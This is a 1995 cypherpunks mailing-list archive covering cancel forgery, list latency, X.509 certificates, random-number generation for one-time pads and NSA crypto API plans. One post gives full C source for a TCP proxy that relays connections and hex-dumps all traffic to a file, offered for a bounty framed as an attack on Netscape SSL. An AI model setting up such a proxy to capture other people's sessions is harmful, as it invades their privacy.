>Message-ID: <cancel.73323.603-3009951517290001@ts7-28.upenn.edu>
>NNTP-Posting-Host: ts7-28.upenn.edu
>Approved: 73323.603@compuserve.com
>Control: cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>X-Cancelled-By: 73323.603@compuserve.com
>Lines: 1

>CANCELLED.

>----end control message

Does this mean that the cancel came from the Compuserve account?
Forging cancel notices is definitely against CIS rules, as is
unsolicited e-mail. I've already talked to a sysop there about it, and
he said he'd pass it along to the CIS Security folks.

If nothing else, that may get his account revoked. Hey, small
victories.



        Michael R. Grabois    | orbit@ix.netcom.com
        Houston, TX           | CI$: 74737,2600
-------------------------------------------------------
    Gravity. It's not just a good idea, it's the law.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 2 Oct 95 09:10:05 PDT
To: <cypherpunks@toad.com
Subject: Re: Yet Another "(Fwd) Internet  Euro-Clipper"
Message-ID: <9510021610.AA00160@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> At 5:12 PM 9/29/95, Peter Trei wrote:
> >Subject: European Governments Agree to Ban Strong Crypto

> The biggest problem I have with this is that this is the third, fourth, or
> fifth posting of Ross Anderson's piece to this list  [...]

> I urge people to read what's on the list and not repost things which have
> already appeared. If they don't have time to read all of the messages on
> the list, which is understandable, then they need to be even more careful
> in posting things.

Reading the list does not neccesarily help - I experience a several hour lag between when
I post something, and when it comes back from the list server.  Thus, even if I'm all 
caught up on my reading the list (as I was when I posted that article), articles may be 'in the
 pipe' which duplicate ones I'm thinking of posting. 

For those curious about the latency, I'm posting this at 12:08, on the US east coast.
How long did it take to reach you?

> 
> Not to pick on Peter Trei, as this happens all the time, whenever a hot
> issue appears.

Short of implementing some content-sensitive form of CSMA/CD, I don't see what we
can do (but lowering the list latency would help a lot).

> --Tim May

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Mon, 2 Oct 95 12:28:10 PDT
To: cypherpunks@toad.com
Subject: SSH random numbers
Message-ID: <Pine.3.89.9510021218.A7340-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


I have finaly been goaded into using SSH. I seems like a
great tool, but I have one major worry. When I install
SSH, it generates the host key right away. When I run
ssh-keygen, it generates my user key right away.
Where is it getting the random numbers. Before I dive
into the source I was wondering if anyone else had
looked into this?

	-Lance 

no PGP sig because I am on a remote machine.

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 2 Oct 95 12:48:51 PDT
To: tcmay@got.net
Subject: Time Lag (was Re: Yet Another "(Fwd) Internet  Euro-Clipper")
Message-ID: <9510021945.AA16056@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 12:20 PM 10/2/95, Peter Trei wrote:
> 
> >For those curious about the latency, I'm posting this at 12:08, on the US
> >east coast.
> >How long did it take to reach you?
> 
> I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

I got it at 11:53 PDT.  I just checked the headers and the delay was split
in a couple of places.  (Correcting all times for PDT)

thunk              -> 9:10  -> alcor.process.com. (And they're off and running!)
alcor.process.com. -> 9:10  -> toad.com.          (delivered in 0 time:)
toad.com.          -> 11:29 -> relay3.uu.net.     (Sat on toad 2hrs, 19 min)
relay3.uu.net.     -> 11:54 -> mail2.pilot.net.   (Sat on relay3 25 mins )
mail2.pilot.net.   -> 11:53 -> verity.com.        (delivered into the past!)

Of course these delays can vary a few minutes either way because of
inaccuracies of time clocks on various machines.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Mon, 2 Oct 95 12:51:40 PDT
To: cme@TIS.COM>
Subject: Re: Certificate proposal & X509 clarifications
Message-ID: <9509028126.AA812663445@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        The Distinguished Name of X509 is NOT intended to be the
unique identifier of a person or a public key.  In the X509 world
two different DNs can have the same public key, and a single
DN can have multiple certificates with possibly different
public keys.  The same public key naturally appears in multiple
certificates when each certificate is only valid for a certain
period of time (e.g., weekly certificates have been proposed for
applications that do not want to implement revocation lists).
        The unique identifier in an X509 certificate is the
DN of the issuer and the serial number that the issuer attached
to the certificate.  Both of these fields appear in the version 1 X509
certificate.  Of course, this assumes that issuers are
following the rule of not issuing two certificates with the same
serial number.
        The designers of version 1 of the X509 certificate format
have realized that they need to allow issuers to attach all kinds
of different attributes to a public key.  This lead to version 3
of the X509 format, which provides for general extensions.  Of course,
this means that there is more rope to hang yourself with when it
comes to designing an overall system, but with careful design,
lots of good things can be done.
        For example, for the S/MIME secure mail effort, the certificates
include the email address of the owner, as certified by the company
that is providing the email post office (e.g., the employer or
service provider).  Note that Netscape Navigator 2.x will support
Version 3 X509 certificates and S/MIME.

        Question: what's a good way to have the existing PGP public
key infrastructure interoperate with the X509 infrastructure?

                --Bob


                       





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 2 Oct 95 09:55:52 PDT
To: "Robert A. Rosenberg" <cypherpunks@toad.com
Subject: Re: WHERE did this come from?
In-Reply-To: <v02130505ac9508c98b3e@[166.84.254.3]>
Message-ID: <9510021655.AA07536@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>This is a KNOWN SPAM (it is currently being talked about in the Net-SPAM
>Usenet Newsgroup). It has been coming from 3 sites (one in Italy, one in
>France, and one in Germany). The national Police in all 3 countries (as
>well as the FBI) are apparently investigating it. To track the situation
>monitor this Web Page (Which should be Globally Accessible):

Does anyone know the officials who are investigating? I have some additional 
information. 

It appears that someone may have obtained the cypherpunks mailing list and used 
it as the basis for the Spam. This is a serious matter.


	Phill Hallam-Baker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Mon, 2 Oct 95 10:38:25 PDT
To: cypherpunks@toad.com
Subject: NT and C2
Message-ID: <Pine.BSD/.3.91.951002132703.28404A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



Here is the URL to an article in Network World by Winn Schwartau 
entitled, "One expert shares his views on Microsoft securitey features.

http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7i/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/ExUP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8Di31MRmypd


If you need a username/password try cypherpunks/cypherpunks

Here is an excerpt:

 Since Microsoft Corp. products are usually robust, I was looking 
forward to seeing what type of security features the company implemented 
in 
Windows NT Workstation Version 3.5. But after walking through the system 
with Microsoft product managers and developers, I was dismayed to find 
how 
woefully short on security features Windows NT is. 
     Despite the fact that the U.S. government is expected to certify 
Windows NT as a secure operating system, Microsoft's first serious 
venture 
into security is not very impressive. Windows NT may pass muster with the 
federal government, but it does not meet the real-world security needs of 
corporations running complex, heterogeneous networked environments.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 2 Oct 95 10:44:55 PDT
To: cypherpunks@toad.com
Subject: List latency.
Message-ID: <9510021744.AA01741@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 12:20 PM 10/2/95, Peter Trei wrote:
> 
> >For those curious about the latency, I'm posting this at 12:08, on the US
> >east coast.
> >How long did it take to reach you?
> 
> I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

Here's the relevant headers for the bounceback to me, which took an hour:

> Received: from relay3.UU.NET [192.48.96.8] by alcor.process.com
>            with SMTP-OpenVMS via TCP/IP; Mon, 2 Oct 1995 13:10 -0400
> Received: from toad.com by relay3.UU.NET with SMTP 
>  id QQzjst04916; Mon, 2 Oct 1995 12:51:05 -0400
> Received: by toad.com id AA00166; Mon, 2 Oct 95 09:10:05 PDT
> Received: from alcor.process.com by toad.com id AA00160; Mon, 2 Oct 95
> 09:10:02 PDT Message-Id: <9510021610.AA00160@toad.com> Received: from thunk
> [192.42.95.240] by alcor.process.com
>            with SMTP-OpenVMS via TCP/IP; Mon, 2 Oct 1995 12:10 -0400
> Date:          Mon, 2 Oct 1995 12:14:30 -6

Translating:

Sent by thunk.process.com                         
12:14 EDT 

Received by alcor.process.com 	
12:10 EDT     -4 minutes (thunk's clock is off)

Received by toad			
  9:10   PDT     0 minutes

Received by uunet			
12:51 EDT     41 minutes

Received by alcor			
13:10 EDT     19 minutes

It looks like there's a considerable delay entering and leaving uunet. I'm not sure which 
machine gets the blame, but it's either toad&uunet, or uunet&alcor.





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Mon, 2 Oct 95 14:22:16 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: One-Time-Pad generation from audio device
In-Reply-To: <Pine.3.89.9510021627.A14466-0100000@unicorn.com>
Message-ID: <Pine.OSF.3.91j.951002141954.21670A-100000@saul1.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Oct 1995, Rev. Mark Grant wrote:

> 
> Over the weekend I hacked up a one-time-pad generator from the random 
> number code I've been writing for Privtool, which uses noise from the 
> audio device to generate random numbers.
> 
> The code basically reads in a 512-byte block from /dev/audio, then takes
> the MD5 of that block to generate 16 bytes of the OTP. The raw audio data
> I'm getting is not particularly random and will compress by 3:1 using gzip
> or compress, so I'm assuming that using a 32:1 ratio here via MD5 will
> give a truly random output (it's certainly uncompressible).

I wouldn't bet on it. I did a similar hack with perl, with a much more
conservative 5 seconds to 32 bytes. That didn't cut it, when I ent'ed the
result it gave 6 bits of entropy / 8 bits of output.
I do recall posting it here.

> 
> Before I release the source code to the Net, can anyone give me any good
> reasons to believe that this won't produce physically random output, or
> make suggestions on how to test, or improve, the generated output ? There's
> a #define which can be used to easily increase the amount of data fed into
> the MD5, but at the moment it will only generate about 1 MB per hour on a
> Sparcstation (limited by the audio input rate), so I don't want to
> increase that if I don't have to. 

Um.. I would try to generate bits quickly, then securely, so for example
you get a 2k buffer and do it 5 sec / 128 bits. Then slow down and overwrite
the buffer and give warnings if the user wants to use the bits too early.

> 
> 	Mark
> 
> 
> 

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Mon, 2 Oct 95 14:27:04 PDT
To: jbass@dmsd.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <199510022126.OAA06234@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509301910.AA10970@dmsd.com> you write:
> 
> The "messenger attack" as described in my earlier posts regarding
> public key encryption and key management seems to apply to NetScape's SSL.
> I have a Fifty dollar bill for the first person to submit to the mail box
> nethack@dmsd.com a working Unix server (with cleartext session logs) which
> accepts all connections on a unix based host to the www port and redirects
> them to netscape.com leaving a clear text log of each session's SSL packets
> in /tmp by session.  All entries become the property of DMS Design. The winner
> and I will submit a claim for one of Community COnneXion's "I HACKED NETSCAPE"
> tee shirts as a server hack. (Have Fun!!)
> 

This is a trivial program!  I can't believe anyone considers this
technically difficult.  But hey, who am I to question, if you'll
pay $50!

Ok, let me back that up with real code.  Here's a proxy I've been
using for experimenting, in lieu of root access & tcpdump.

Usage: proxy localport remotehost remoteport > capturefile

Try:

$ ./proxy 2999 www.netscape.com 80 > capturefile &
$ netscape http://localhost:2999/home/welcome.html &

or

$ ./proxy 3999 alpha.mkn.co.uk 443 > capturefile &
$ netscape https://localhost:3999/ &

Here's the source.  It's a bit unstable, and could be a improved
a little, but was fine for a quick kludge.  So feel free send the
$50 to the following address at your convenience!! :-)

David Wagner
UC Berkeley
330 Soda Hall
Berkeley, CA  94720


#include <stdio.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <ctype.h>

/* dump bytes, sorta similar to tcpdump's style */
dump(char *p, int len)
{
	int	i, j;

	while (len > 0) {
		for (i=0; i<16 && i < len; i++) {
			printf("%2.2x", (unsigned char) p[i]);
			if (i & 1)
				printf(" ");
		}
		j = i;
		for (; i<16; i++) {
			printf("  ");
			if (i & 1)
				printf(" ");
		}
		printf("    # ");
		for (i=0; i<j; i++)
			printf("%c", (isprint(p[i])) ? p[i] : '.');
		printf("\n");

		len -= j; p += j;
	}
	printf("\n");
}

/* copy one message; guaranteed not to block */
int fromto(int from, int to)
{
	static char	buf[2048];
	int	len;

	len = read(from, buf, sizeof(buf));
	switch(len) {
		case 0:		return(0); /* EOF */
		case -1:	perror("read"); exit(1);
	}
	dump(buf, len);
	return(write(to, buf, len));
}

/* kludge to deal with select fd_set * parameters weirdness */
/* #define	FSC(x)	((fd_set *) x) */
#define	FSC(x)	((int *) x)

/* repeatedly copy both ways */
proxy(int xfd, int yfd)
{
	fd_set	fs;
	char	buffer[2048];
	int	done = 0;

	while (!done) {
		FD_ZERO(&fs);
		FD_SET(xfd, &fs); FD_SET(yfd, &fs);
		if (select(64, FSC(&fs), FSC(0), FSC(0), (struct timeval *) 0)
							== -1) {
			perror("select"); exit(1);
		}
		if (FD_ISSET(xfd, &fs))
			if (fromto(xfd, yfd) <= 0)
				done = 1;
		if (FD_ISSET(yfd, &fs))
			if (fromto(yfd, xfd) <= 0)
				done = 1;
	}
}

int remoteinit(char *addr, int port)
{
	struct sockaddr_in si;
	int fd;
	struct hostent *hp;
	char    hostname[MAXHOSTNAMELEN];

	memset(&si, 0, sizeof(struct sockaddr_in));
	si.sin_family = AF_INET;
	si.sin_addr.s_addr = inet_addr(addr);
	si.sin_port = port;
	if (si.sin_addr.s_addr == -1)
		hp = gethostbyname(addr);
	else
		hp = gethostbyaddr((char *)&si.sin_addr.s_addr,
					sizeof(struct sockaddr_in), AF_INET);
	if (hp == NULL) {
		fprintf(stderr, "unknown host %s\n", addr); exit(1);
	}
	si.sin_family = hp->h_addrtype;
	memcpy(&(si.sin_addr), hp->h_addr, hp->h_length);
	strncpy(hostname, hp->h_name, MAXHOSTNAMELEN-1);
 	if (si.sin_family == AF_INET)
		printf("Connecting to %s (%s)\n", hostname,
			inet_ntoa(*(struct in_addr *)&si.sin_addr.s_addr));
	else
		printf("Connecting to %s\n", hostname);

	if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket"); exit(1);
	}
	if (connect(fd, &si, sizeof(si)) < 0) {
		perror("connect"); exit(1);
	}
	return(fd);
}

int localinit(int port)
{
	struct sockaddr_in thissock;
	int	s, i;

	if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket"); exit(1);
	}

	memset((char *)&thissock, 0, sizeof(struct sockaddr_in));
	thissock.sin_family = AF_INET;
	thissock.sin_port = port;
	thissock.sin_addr.s_addr = htonl(INADDR_ANY);
 
	i = 1;
	setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&i, sizeof(int));

	if (bind(s, (struct sockaddr *)&thissock, sizeof(struct sockaddr_in)) < 0) {
		perror("bind"); exit(1);
	}
	if (listen(s, 5) < 0) {
		perror("listen"); exit(1);
	}

	return(s);
}

usage()
{
		fprintf(stderr, "Usage: proxy localport remotehost remoteport\n");
		exit(1);
}


int main(int argc, char **argv)
{
	int	partialxfd, xfd, yfd, i, localport, remoteport;
	struct sockaddr_in thatsock;
	char *remotehost;

	if (argc != 4)
		usage();
	localport = atoi(argv[1]);
	remotehost = argv[2];
	remoteport = atoi(argv[3]);
	if (localport < 1024 || remoteport <= 0)
		usage();

	partialxfd = localinit(localport);

	for (;;) {
		i = sizeof(struct sockaddr_in);
		if ((xfd = accept(partialxfd, (struct sockaddr *)&thatsock, &i)) < 0) {
			perror("accept"); exit(1);
		}
  
		yfd = remoteinit(remotehost, remoteport);
		proxy(xfd, yfd);
	}
}



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Oct 95 14:48:34 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Certificate proposal
Message-ID: <199510022148.OAA26396@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 10/2/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>X.509 certificates are not totally bad.  Their structure contains lessons
>for anyone designing a certificate structure.  [Raw X.509 does not imply a
>hierarchy, I believe.  Steve Kent & Co. do.]

I agree with you about hierarchies, and even RFC1422 doesn't really force you
to use hierarchy, much less a government-enforced one, though it clearly 
prefers it, and it definitely does support the concept of having a key signed
by more than one CA, at least for CA's keys.  The most important differences,
from my perspective, are
1) X.509 explicitly addresses Certificate Revocation Lists, though it
        isn't real precise about how they should be distributed, and the
        hierarchical approach isn't necessarily the best.  (Maybe put the 
        location of the preferred CRL for a key certificate in the cert itself?)
2) X.509 certificates, unlike PGP, only support once signer per certificate;
        this is a slight hierarchical bias, which forces you to haul around a 
        pile of certificates to have multiply signed keys, without specifying
        a syntax, so simple key-cert programs may not know what to do with
        multiples, and hence force hierarchy; the rest of us will just have
        to deal with multiply syntaxes.  But that's mainly a verbosity
        problem, duplicating Distinguished Names and key info.
3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
        mechanism for additional information other than cramming it into
        the username, but supposedly X.509 Version 3 includes something?

>Perhaps the biggest problem is the use of a name -- a text string (or some
>abortion like the DN which can be reduced to a text string) -- as the
>anchor point.    [.... use the public key instead ....]
>What remains is a need for attributes to be bound to a key.  ...
>Current certificates are going down a fundamentally wrong path.  They are
>trying to bind keys to people and let Society somehow bind attributes to
>people -- but the latter binding is too weak to permit keys to be bound to
>attributes or permissions.

Eventually, there may be a way to represent most of the attributes you want
to describe in some format, which I dare say will look _far_ uglier than
ASN.1 :-)
Binding a key to a text-string usually representing a person does give you
the slack to use other mechanisms rather than wait for the release of
/standard-name="Attribute Semantics Notation"/version=32769/ORG="International
Slowness
Organization"/Country=none/reliability=ExtremelyHighTrustUsThisTime/versionh
istory=

For now, there do seem to be some kinds of attributes that would benefit from
better representations than a human-name plus free-form text, such as
"which application does the user want you to use this key for?" "how much
should I
trust the user's desire to have me use that key for that application?"
"how do I get this key's owner to give me money?" "does the key-holder 
have the authority to speak for a given organization/human/bank account?"
If you look at Verisign's DNs, or the text in my PGP keys, you'll see various
ugly attempts at this.

And then there's "WHICH person named Bill Stewart does this key belong to?"
For the latter, I'm interested in solutions other than "Social Security Number",
"Citizen-Unit Nationalized ID Card Number", etc.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 2 Oct 95 12:36:47 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: CJR for perl-RSA t-shirt
Message-ID: <v02130500ac9540e8bac8@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:58 10/1/95, Robert Hettinga wrote:
>>Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
>>          Requested
>>
>>Subject:  Commodity Jurisdiction Request for
>>          perl-RSA t-shirt, an encryption program
>
>ROTFL!
>

I agree. I especially laughed at the part that stated "... also as a bar
code, making the t-shirt machine readable as well as machine washable."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 2 Oct 95 13:18:02 PDT
To: cypherpunks@toad.com
Subject: Crypto APIs
Message-ID: <199510022029.QAA05671@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of weeks ago I attended a meeting at the NATO SHAPE Technical
Center in the Hague to discuss international cryptographic APIs.  Several
high-ranking NSA types were there, as well as their counterparts from
various NATO countries plus a handful of industry crypto people (like
me).  The idea of the meeting was to find a way to separate
cryptographic function from cryptographic interfaces, in a way that
allows the applications that call the cryptographic functions to be
more freely exported.  That is, I can write and export an application
that calls the crypto API but that doesn't actually implement the
cryptography, and then, when it reaches its destination, the
locally-preferred cryptosystem can be plugged right in.  Crypto might
be implemented in hardware (e.g., Fortezza) or software (e.g., with a
shared library or pseudo-device driver).

Obviously, this idea is somewhat (completely?) at odds with the
criteria presented at last month's NIST workshops for exportable
software key escrow systems.  One of the requirements given for such
systems is that it be difficult to replace the crypto with something
that doesn't implement key escrow.  But who ever said the government
was consistent?  Interestingly, it was clear that many people in NSA
believe that applications that call an API are controlled under ITAR,
but there is some recognition that this may be wishful thinking or may
change soon.  So while some (maybe most) of NSA wants to prevent
development of standard APIs and prevent the export of applications
that use them, others recognize that these will evolve by themselves
anyway and will be very hard to control once they do.  Anyway, the
situation is far from clear.  It seems best to encourage the realistic
side of NSA as much as possible...

I learned a few interesting things at the meeting.  First of all,
overwhelmingly, there is recognition, especially on the part of the
non-US government security agencies, that there is enormous value in
being able to buy off-the-shelf applications like Microsoft Word or
Netscape Navigator and just plugging in the local military cryptosystem
and using it for classified traffic.  Everyone seemed to agree that
there is a growing need for this and that it's too expensive to rely
on custom software.  There is also movement away from the traditional
military ``link encryption'' approach that involves centrally-
controlled secure networks in favor of a ``risk management'' approach
that favors end-to-end security with off-the-shelf products.  In other
words, the parts of the military that are concerned with actually
securing communications want exactly what we want, and are just
starting to realize it.  While lots of us have always known this, I
had never heard it articulated as quite clearly (or as loudly) by
actual comsec/infosec people before.

Second, the senior NSA guy mentioned a few things I hadn't heard
before.  Fortezza is now approved for classified traffic through the
SECRET level.  Also, the ``type 1'' (classified) through ``type 4''
(unevaluated) cryptography standard is being scrapped in favor of a
three ``tier'' system, as follows (these are approximate quotes, from
my rough notes):

Tier 1 traffic is stuff related to ``national command authority''.
(Seems to be secret and top secret and up).  It will require NSA
cryptosystems, hardware implementation, and will NOT employ key escrow
(because of the ``obvious risks''!).

Tier 2 traffic is information that, if disclosed, would have
``national implications'' if revealed.  Examples given include things
like the national power grid, the banking system, etc.  It was
unclear whether any classified traffic would be included in tier 2.
Clearly, some of what is now called ``sensitive but unclassified''
(SBU) will be in tier 2.  Anyway, tier 2 systems will be approved by
NIST (not NSA, although there will obviously be NSA input into the
standards) and will require hardware implementation.  Tier 2 traffic
will be escrowed, and the government will escrow its own keys.
Fortezza is an example tier 2 device (but read on...)

Tier 3 traffic will be that which would have ``private implications''
if disclosed.  Examples given included personal financial and medical
records, etc.  Current SBU traffic not in tier 2.  Tier 3 would also
be handled by NIST, employ commercial or government key escrow (like
tier 2) and would be permitted to be implemented in software.

Here's the surprise: Tiers 2 and 3 will be interoperable.  So there
will be published algorithms for tier 3.  It is possible that tiers 2
and 3 will have the same algorithms, and that the government will
suggest them.  It was unclear with interoperability will require that
all tier 2 algorithms will be published and implementable in tier 3
software or whether this means that tier 2 devices will also have to
implement the tier 3 algorithms.  There is an obvious choice of a tier
2/3 algorithm: Skipjack (although there were concerns that this is
``too slow'').  So we may eventually find out whether ``S1'' was
really Skipjack after all....

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 2 Oct 95 08:40:32 PDT
To: cypherpunks@toad.com
Subject: One-Time-Pad generation from audio device
Message-ID: <Pine.3.89.9510021627.A14466-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Over the weekend I hacked up a one-time-pad generator from the random 
number code I've been writing for Privtool, which uses noise from the 
audio device to generate random numbers.

The code basically reads in a 512-byte block from /dev/audio, then takes
the MD5 of that block to generate 16 bytes of the OTP. The raw audio data
I'm getting is not particularly random and will compress by 3:1 using gzip
or compress, so I'm assuming that using a 32:1 ratio here via MD5 will
give a truly random output (it's certainly uncompressible).

Before I release the source code to the Net, can anyone give me any good
reasons to believe that this won't produce physically random output, or
make suggestions on how to test, or improve, the generated output ? There's
a #define which can be used to easily increase the amount of data fed into
the MD5, but at the moment it will only generate about 1 MB per hour on a
Sparcstation (limited by the audio input rate), so I don't want to
increase that if I don't have to. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Mon, 2 Oct 95 13:54:35 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: Crypto APIs
In-Reply-To: <199510022029.QAA05671@crypto.com>
Message-ID: <199510022054.QAA80371@bugsy.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"mb" == Matt Blaze <mab@crypto.com> writes:

mb> A couple of weeks ago I attended a meeting at the NATO SHAPE
mb> Technical Center in the Hague to discuss international
mb> cryptographic APIs.

  Is there any overlap between this effort and TIS' International
Cryptography Experiment (ICE)?

michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 14:09:07 PDT
To: Doug.Hughes@eng.auburn.edu
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199510020556.WAA01007@comsec.com>
Message-ID: <9510022103.AA10569@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
>Date: Thu, 28 Sep 1995 19:31:00 -0500



>A company in Israel named Elementrix has just announce at Interop an
>entirely new paradigm in secure transactions. They have a secure
>one time pad that allows people to exchange mail and ftp files back
>in forth in complete security without the worries of key management
>or storage or secure random number generation or synchronization.


As far as I could tell from your description, this is an autokey cipher --
not a OTP.  

An autokey cipher starts with a shared secret key and uses previous
plaintext or ciphertext as part of the key.  DES CBC is an autokey cipher.

The original autokey used previous plaintext or ciphertext as the only key.
More modern ones mix in the previous text.

I had a design for one, several years ago, which kept a mapping in memory
and changed the mapping based on incoming plaintext.  Therefore, there is
state information kept at both sides which keeps changing.

One might think that if the attacker never gets in, today's randomness is
just as good as yesterday's.  That might even be true.  However, there are
many openings for finding relationships between yesterday's and today's
ciphertexts.

I look forward to seeing the actual algorithm.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHBTU1QXJENzYr45AQHRigP/Yqw0T3n2SDubgRZIrKx8WpUSJtmBwcuf
nIBxxwsOwu10sQti7hw3Zcj9tRM6JAcqFNh1U2LbYT3u7ELgh2Hicq0jLcr+3r4h
B0H3LlbU9iv7WlETQF8Tw2KQcfDKLkYkeMRnS27cKnJIFHK9w0g4UTwabfB+m5SV
sjnUZbv6Q1A=
=P9X7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 2 Oct 95 13:59:33 PDT
To: michael shiplett <walrus@ans.net>
Subject: Re: Crypto APIs
In-Reply-To: <199510022054.QAA80371@bugsy.aa.ans.net>
Message-ID: <199510022110.RAA05985@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> "mb" == Matt Blaze <mab@crypto.com> writes:
> 
> mb> A couple of weeks ago I attended a meeting at the NATO SHAPE
> mb> Technical Center in the Hague to discuss international
> mb> cryptographic APIs.
> 
>   Is there any overlap between this effort and TIS' International
> Cryptography Experiment (ICE)?
> 
> michael

Yes.  (ICE, by the way, is funded by ARPA and run by TIS.  Strange notion
of "experiment", given that the result of the "experiment" will be to see
whether the government will allow it.  So one part of DoD is funding TIS
to find out how another part of DoD behaves...)

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 2 Oct 95 17:11:33 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: De Re ASN.1 and encoding rules ( was Re: X.509,...)
In-Reply-To: <9510021511.AA10057@tis.com>
